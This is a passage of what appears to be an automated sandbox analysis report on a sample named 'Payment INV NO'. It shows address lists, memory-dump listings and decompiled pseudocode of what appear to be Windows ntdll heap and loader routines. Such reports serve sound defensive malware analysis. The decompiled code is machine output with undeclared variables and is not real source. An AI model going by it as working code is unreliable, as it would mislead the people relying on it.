                                                          0x0179ea62
                                                          0x0179ea6a
                                                          0x0179ea6e
                                                          0x0179ea79
                                                          0x017f57b3
                                                          0x017f57c2
                                                          0x017f57c4
                                                          0x017f57c6
                                                          0x0179eb97
                                                          0x0179eb9c
                                                          0x0179eb9e
                                                          0x0179eba2
                                                          0x0179eba2
                                                          0x0179ebac
                                                          0x017f5861
                                                          0x017f5865
                                                          0x017f5865
                                                          0x0179ebb2
                                                          0x0179ebb8
                                                          0x0179ebc0
                                                          0x0179ebc0
                                                          0x0179ebc8
                                                          0x017f586f
                                                          0x017f5871
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5877
                                                          0x017f587b
                                                          0x017f587d
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5883
                                                          0x017f5886
                                                          0x017f5895
                                                          0x017f5895
                                                          0x00000000
                                                          0x0179ebce
                                                          0x0179ebd1
                                                          0x017f589f
                                                          0x017f58a4
                                                          0x017f58a6
                                                          0x017f58a8
                                                          0x00000000
                                                          0x00000000
                                                          0x017f58ae
                                                          0x017f58b2
                                                          0x017f58b7
                                                          0x017f58b7
                                                          0x017f58b7
                                                          0x0179ebd7
                                                          0x0179ebdf
                                                          0x0179ebdf
                                                          0x0179ebc8
                                                          0x017f57cc
                                                          0x017f57cf
                                                          0x017f57d1
                                                          0x017f57d9
                                                          0x017f57de
                                                          0x017f57e3
                                                          0x017f57e5
                                                          0x017f57e7
                                                          0x017f57ec
                                                          0x017f57f0
                                                          0x017f57f0
                                                          0x017f57ec
                                                          0x017f57e5
                                                          0x017f57f1
                                                          0x017f57f5
                                                          0x017f57fa
                                                          0x017f5801
                                                          0x017f5801
                                                          0x0179ea88
                                                          0x0179ea94
                                                          0x017f5807
                                                          0x017f5807
                                                          0x0179ea9d
                                                          0x0179ebe2
                                                          0x0179ebe7
                                                          0x00000000
                                                          0x00000000
                                                          0x0179ebf7
                                                          0x0179ec00
                                                          0x0179ec05
                                                          0x0179ec0a
                                                          0x0179ec0f
                                                          0x0179ec19
                                                          0x0179ec1a
                                                          0x0179ec22
                                                          0x0179ec23
                                                          0x0179ec2c
                                                          0x0179ec30
                                                          0x0179ec31
                                                          0x0179ec35
                                                          0x0179ec3a
                                                          0x0179ec3c
                                                          0x017f5818
                                                          0x017f5827
                                                          0x017f5829
                                                          0x017f582b
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5833
                                                          0x017f5833
                                                          0x0179ec4c
                                                          0x0179ec55
                                                          0x0179ec5a
                                                          0x0179ec5f
                                                          0x0179ec64
                                                          0x0179ec6c
                                                          0x0179ec74
                                                          0x0179ec75
                                                          0x0179ec7e
                                                          0x0179ec82
                                                          0x0179ec83
                                                          0x0179ec8c
                                                          0x0179ec8e
                                                          0x0179ec90
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5839
                                                          0x00000000
                                                          0x0179eaa3
                                                          0x0179eaa6
                                                          0x0179eb87
                                                          0x0179eb95
                                                          0x00000000
                                                          0x0179eb95
                                                          0x0179eab6
                                                          0x017f5850
                                                          0x0179eabc
                                                          0x0179eac6
                                                          0x0179eacf
                                                          0x0179ead4
                                                          0x0179eadc
                                                          0x0179eae4
                                                          0x0179eaec
                                                          0x0179eaf7
                                                          0x0179eaf8
                                                          0x0179eb01
                                                          0x0179eb08
                                                          0x0179eb09
                                                          0x0179eb14
                                                          0x0179eb14
                                                          0x0179eb1b
                                                          0x0179eb27
                                                          0x0179eb2c
                                                          0x0179eb35
                                                          0x0179eb3d
                                                          0x0179eb45
                                                          0x0179eb4d
                                                          0x0179eb5b
                                                          0x0179eb5c
                                                          0x0179eb65
                                                          0x0179eb6c
                                                          0x0179eb6d
                                                          0x0179eb7d
                                                          0x0179eb81
                                                          0x017f5841
                                                          0x017f5843
                                                          0x017f5843
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5849
                                                          0x017f5849
                                                          0x00000000
                                                          0x017f5849
                                                          0x0179eb81
                                                          0x00000000
                                                          0x0179eb1b
                                                          0x0179ea9d

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@
                                                          • API String ID: 0-1177533131
                                                          • Opcode ID: 94731aef8d428f9d15cbfee033bb17702896258e1f87ac4c519836b7688fe17b
                                                          • Instruction ID: debbade807fa64dd9626a3b66d59c0976ff4f05619293ed6f463639619fe6052
                                                          • Opcode Fuzzy Hash: 94731aef8d428f9d15cbfee033bb17702896258e1f87ac4c519836b7688fe17b
                                                          • Instruction Fuzzy Hash: E3A16DB15083459FEB21DF24D484B6BFBE8BB84729F00492EF69996240DB74D948CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BA229 Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E017BA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E017BDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E017D9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						L0185A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E017D9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0179B150();
					} else {
						E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0179B150(0x178d4f0, _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E017B7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						L0185138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E017B7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E017B7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						L01851582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E017B7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E017B7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					L01851582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E017ED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                          0x017ba229
                                                          0x017ba231
                                                          0x017ba23f
                                                          0x017ba242
                                                          0x017ba244
                                                          0x017ba24c
                                                          0x017ba255
                                                          0x017ba25a
                                                          0x017ba25f
                                                          0x01801c76
                                                          0x01801c78
                                                          0x01801c7e
                                                          0x01801c7f
                                                          0x01801c81
                                                          0x01801c82
                                                          0x01801c84
                                                          0x01801c89
                                                          0x01801c8b
                                                          0x01801c9e
                                                          0x01801c9e
                                                          0x01801cab
                                                          0x01801cb2
                                                          0x00000000
                                                          0x01801cb2
                                                          0x01801c8d
                                                          0x01801c92
                                                          0x00000000
                                                          0x00000000
                                                          0x01801c94
                                                          0x01801c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01801c98
                                                          0x017ba265
                                                          0x017ba265
                                                          0x017ba266
                                                          0x017ba26f
                                                          0x017ba270
                                                          0x017ba276
                                                          0x017ba277
                                                          0x017ba279
                                                          0x017ba27e
                                                          0x017ba282
                                                          0x01801db5
                                                          0x01801dbb
                                                          0x01801dc1
                                                          0x01801dc5
                                                          0x01801de4
                                                          0x01801de9
                                                          0x01801dc7
                                                          0x01801ddc
                                                          0x01801de1
                                                          0x01801def
                                                          0x01801df3
                                                          0x01801df7
                                                          0x01801dfe
                                                          0x01801e06
                                                          0x017ba302
                                                          0x017ba308
                                                          0x017ba308
                                                          0x017ba288
                                                          0x017ba28d
                                                          0x017ba294
                                                          0x01801cc1
                                                          0x017ba29a
                                                          0x017ba29a
                                                          0x017ba29a
                                                          0x017ba29f
                                                          0x01801ccb
                                                          0x01801cd1
                                                          0x01801cd8
                                                          0x01801cea
                                                          0x01801cea
                                                          0x01801cd8
                                                          0x017ba2a9
                                                          0x017ba2af
                                                          0x017ba2bc
                                                          0x01801cfd
                                                          0x017ba2c2
                                                          0x017ba2c2
                                                          0x017ba2c2
                                                          0x017ba2c7
                                                          0x01801d07
                                                          0x01801d0d
                                                          0x01801d14
                                                          0x01801d1f
                                                          0x01801d21
                                                          0x01801d2c
                                                          0x01801d2c
                                                          0x01801d2c
                                                          0x01801d47
                                                          0x01801d47
                                                          0x01801d14
                                                          0x017ba2cd
                                                          0x017ba2d2
                                                          0x017ba2d9
                                                          0x01801d5a
                                                          0x017ba2df
                                                          0x017ba2df
                                                          0x017ba2df
                                                          0x017ba2e4
                                                          0x01801d69
                                                          0x01801d6b
                                                          0x01801d76
                                                          0x01801d76
                                                          0x01801d76
                                                          0x01801d91
                                                          0x01801d91
                                                          0x017ba2ea
                                                          0x017ba2f0
                                                          0x017ba2f5
                                                          0x01801da8
                                                          0x01801dad
                                                          0x01801dad
                                                          0x017ba2fd
                                                          0x017ba300
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: HEAP: $HEAP[%wZ]: $`
                                                          • API String ID: 2994545307-1842340204
                                                          • Opcode ID: 08eb5c003341b9e637b7d78ab70ff28c5fb6457cc2fb1763521f63927ca1a0f3
                                                          • Instruction ID: fc3a8d2d588a265ebe439fa0fa4100075abb5b25bf5319103bbc40070117a01f
                                                          • Opcode Fuzzy Hash: 08eb5c003341b9e637b7d78ab70ff28c5fb6457cc2fb1763521f63927ca1a0f3
                                                          • Instruction Fuzzy Hash: 305108322056859FE722EB68CC88FA7B7E8FB80B60F050464F955C72D1D774D940C761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179F51D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E0179F51D(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t54;
				intOrPtr _t63;
				intOrPtr _t76;
				signed int _t77;
				signed int _t86;
				signed int _t88;
				signed int _t89;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr* _t93;
				void* _t94;
				signed int _t95;
				signed int _t101;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;
				signed int _t110;
				intOrPtr* _t111;
				void* _t112;
				void* _t113;
				intOrPtr* _t115;
				void* _t116;
				signed int _t117;
				signed int _t118;
				signed int _t120;
				void* _t125;

				_t106 = __edx;
				_t93 = __ecx;
				_t120 = (_t118 & 0xfffffff8) - 0x14;
				_v8 =  *0x188d360 ^ _t120;
				_t115 = __ecx;
				_v24 =  *[fs:0x30];
				_t88 = 0;
				_v16 = __ecx;
				_push(_t108);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L3:
					 *(_t115 + 0x20) =  *(_t115 + 0x20) | 0xffffffff;
					E017A0225(_t88, _t93, _t108, _t115,  *(_t115 + 0x20));
					L4:
					_t125 =  *0x1888472 - _t88; // 0x0
					if(_t125 != 0) {
						_t106 =  *0x7ffe0330;
						_t89 =  *0x188b210; // 0x0
						_t94 = 0x20;
						_t93 = _t94 - (_t106 & 0x0000001f);
						asm("ror ebx, cl");
						_t88 = _t89 ^ _t106;
					}
					E017AEEF0(0x18852d8);
					_t54 =  *_t115;
					while(1) {
						_v20 = _t54;
						if(_t54 == _t115) {
							break;
						}
						_t22 = _t54 - 0x54; // -84
						_t109 = _t22;
						__eflags =  *(_t109 + 0x34) & 0x00000008;
						if(( *(_t109 + 0x34) & 0x00000008) != 0) {
							_push(_t93);
							_t106 = 2;
							E017A8B80(_t109, _t106);
							__eflags = _t88;
							if(_t88 != 0) {
								 *0x188b1e0(_t109);
								 *_t88();
							}
							_t93 = _t109;
							E017A8800(_t93, 1);
							_t63 = _v32;
							__eflags =  *(_t63 + 0x68) & 0x00000100;
							if(( *(_t63 + 0x68) & 0x00000100) != 0) {
								_t93 = _t109;
								L0181EA20(_t93);
							}
						}
						__eflags =  *0x1885780 & 0x00000005;
						if(__eflags != 0) {
							_t46 = _t109 + 0x24; // -48
							L01815510("minkernel\\ntdll\\ldrsnap.c", 0xc5e, 0x177e704, 2, 0x177e6ec, _t46);
							_t120 = _t120 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t109 + 0x18)));
						E017A0100(_t88, _t93, _t109, _t115, __eflags);
						_t54 =  *_v28;
					}
					_t65 = E017AEB70(_t93, 0x18852d8);
					while(1) {
						L8:
						_t95 =  *(_t115 + 0x18);
						if(_t95 == 0) {
							break;
						}
						_t110 =  *_t95;
						__eflags = _t110 - _t95;
						if(_t110 != _t95) {
							_t65 =  *_t110;
							 *_t95 =  *_t110;
						} else {
							_t34 = _t115 + 0x18;
							 *_t34 =  *(_t115 + 0x18) & 0x00000000;
							__eflags =  *_t34;
						}
						__eflags = _t110;
						if(_t110 == 0) {
							break;
						} else {
							E017B2280(_t65, 0x18884d8);
							_t92 =  *((intOrPtr*)(_t110 + 4));
							_t37 = _t110 + 8; // -76
							_t107 = _t37;
							_t101 =  *(_t92 + 0x1c);
							_t76 =  *_t101;
							_v28 = _t76;
							__eflags = _t76 - _t107;
							if(_t76 != _t107) {
								_t117 = _v24;
								do {
									_t77 =  *_t117;
									_t101 = _t117;
									_t117 = _t77;
									__eflags = _t77 - _t107;
								} while (_t77 != _t107);
								_t115 = _v16;
							}
							 *_t101 =  *_t107;
							__eflags =  *(_t92 + 0x1c) - _t107;
							if(__eflags == 0) {
								asm("sbb eax, eax");
								_t86 =  ~(_t101 - _t107) & _t101;
								__eflags = _t86;
								 *(_t92 + 0x1c) = _t86;
							}
							_t106 = 0;
							_push( &_v12);
							E017A093F(_t92, _t92, 0, _t110, _t115, __eflags);
							E017AFFB0(_t92, _t110, 0x18884d8);
							__eflags = _v20;
							if(_v20 != 0) {
								E0179F51D(_t92, 0);
							}
							_t65 = E017B77F0( *0x1887b98, 0, _t110);
							continue;
						}
					}
					_t111 =  *_t115;
					 *(_t115 + 0x20) = 0xfffffffe;
					if(_t111 == _t115) {
						L14:
						_pop(_t112);
						_pop(_t116);
						_pop(_t90);
						return E017DB640(_t65, _t90, _v8 ^ _t120, _t106, _t112, _t116);
					} else {
						goto L10;
					}
					do {
						L10:
						_t91 =  *_t111;
						_t113 = _t111 + 0xffffffac;
						 *(_t113 + 0x34) =  *(_t113 + 0x34) | 0x00000002;
						E017B2280(_t65, 0x18884d8);
						E017A008A(_t113, _t115);
						if(( *(_t113 + 0x34) & 0x00000080) != 0) {
							_t17 = _t113 + 0x74; // -140
							L0179F900(0x18885fc, _t17);
							_t18 = _t113 + 0x68; // -152
							L0179F900(0x18885f4, _t18);
							 *(_t113 + 0x20) =  *(_t113 + 0x20) & 0x00000000;
						}
						E017AFFB0(_t91, _t113, 0x18884d8);
						if( *0x1887b94 != 0) {
							E017D0413(_t113);
						}
						_t65 = E017AEC7F(_t113);
						_t111 = _t91;
					} while (_t91 != _t115);
					goto L14;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L4;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) != 9) {
					goto L8;
				}
				goto L3;
			}










































                                                          0x0179f51d
                                                          0x0179f51d
                                                          0x0179f525
                                                          0x0179f52f
                                                          0x0179f53b
                                                          0x0179f53d
                                                          0x0179f541
                                                          0x0179f543
                                                          0x0179f547
                                                          0x0179f54c
                                                          0x0179f55a
                                                          0x0179f55a
                                                          0x0179f55e
                                                          0x0179f563
                                                          0x0179f563
                                                          0x0179f569
                                                          0x0179f718
                                                          0x0179f720
                                                          0x0179f72b
                                                          0x0179f72c
                                                          0x0179f72e
                                                          0x0179f730
                                                          0x0179f730
                                                          0x0179f574
                                                          0x0179f579
                                                          0x0179f57b
                                                          0x0179f57b
                                                          0x0179f581
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f61f
                                                          0x0179f61f
                                                          0x0179f622
                                                          0x0179f626
                                                          0x0179f628
                                                          0x0179f62b
                                                          0x0179f62e
                                                          0x0179f633
                                                          0x0179f635
                                                          0x0179f73a
                                                          0x0179f740
                                                          0x0179f740
                                                          0x0179f63d
                                                          0x0179f63f
                                                          0x0179f644
                                                          0x0179f648
                                                          0x0179f64f
                                                          0x017f5d11
                                                          0x017f5d13
                                                          0x017f5d13
                                                          0x0179f64f
                                                          0x0179f655
                                                          0x0179f65c
                                                          0x017f5d1d
                                                          0x017f5d37
                                                          0x017f5d3c
                                                          0x017f5d3c
                                                          0x0179f662
                                                          0x0179f664
                                                          0x0179f667
                                                          0x0179f670
                                                          0x0179f670
                                                          0x0179f58c
                                                          0x0179f591
                                                          0x0179f591
                                                          0x0179f591
                                                          0x0179f596
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f677
                                                          0x0179f679
                                                          0x0179f67b
                                                          0x0179f706
                                                          0x0179f708
                                                          0x0179f681
                                                          0x0179f681
                                                          0x0179f681
                                                          0x0179f681
                                                          0x0179f681
                                                          0x0179f685
                                                          0x0179f687
                                                          0x00000000
                                                          0x0179f68d
                                                          0x0179f692
                                                          0x0179f697
                                                          0x0179f69a
                                                          0x0179f69a
                                                          0x0179f69d
                                                          0x0179f6a0
                                                          0x0179f6a2
                                                          0x0179f6a6
                                                          0x0179f6a8
                                                          0x0179f6f2
                                                          0x0179f6f6
                                                          0x0179f6f6
                                                          0x0179f6f8
                                                          0x0179f6fa
                                                          0x0179f6fc
                                                          0x0179f6fc
                                                          0x0179f700
                                                          0x0179f700
                                                          0x0179f6ac
                                                          0x0179f6ae
                                                          0x0179f6b1
                                                          0x0179f6b9
                                                          0x0179f6bb
                                                          0x0179f6bb
                                                          0x0179f6bd
                                                          0x0179f6bd
                                                          0x0179f6c4
                                                          0x0179f6c6
                                                          0x0179f6c9
                                                          0x0179f6d3
                                                          0x0179f6d8
                                                          0x0179f6dd
                                                          0x0179f711
                                                          0x0179f711
                                                          0x0179f6e8
                                                          0x00000000
                                                          0x0179f6e8
                                                          0x0179f687
                                                          0x0179f59c
                                                          0x0179f59e
                                                          0x0179f5a7
                                                          0x0179f60d
                                                          0x0179f611
                                                          0x0179f612
                                                          0x0179f613
                                                          0x0179f61e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f5a9
                                                          0x0179f5a9
                                                          0x0179f5a9
                                                          0x0179f5ab
                                                          0x0179f5b3
                                                          0x0179f5b7
                                                          0x0179f5be
                                                          0x0179f5c7
                                                          0x0179f5c9
                                                          0x0179f5d2
                                                          0x0179f5d7
                                                          0x0179f5e0
                                                          0x0179f5e5
                                                          0x0179f5e5
                                                          0x0179f5ee
                                                          0x0179f5fa
                                                          0x017f5d46
                                                          0x017f5d46
                                                          0x0179f602
                                                          0x0179f607
                                                          0x0179f609
                                                          0x00000000
                                                          0x0179f5a9
                                                          0x0179f552
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f558
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          Strings
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 017F5D32
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
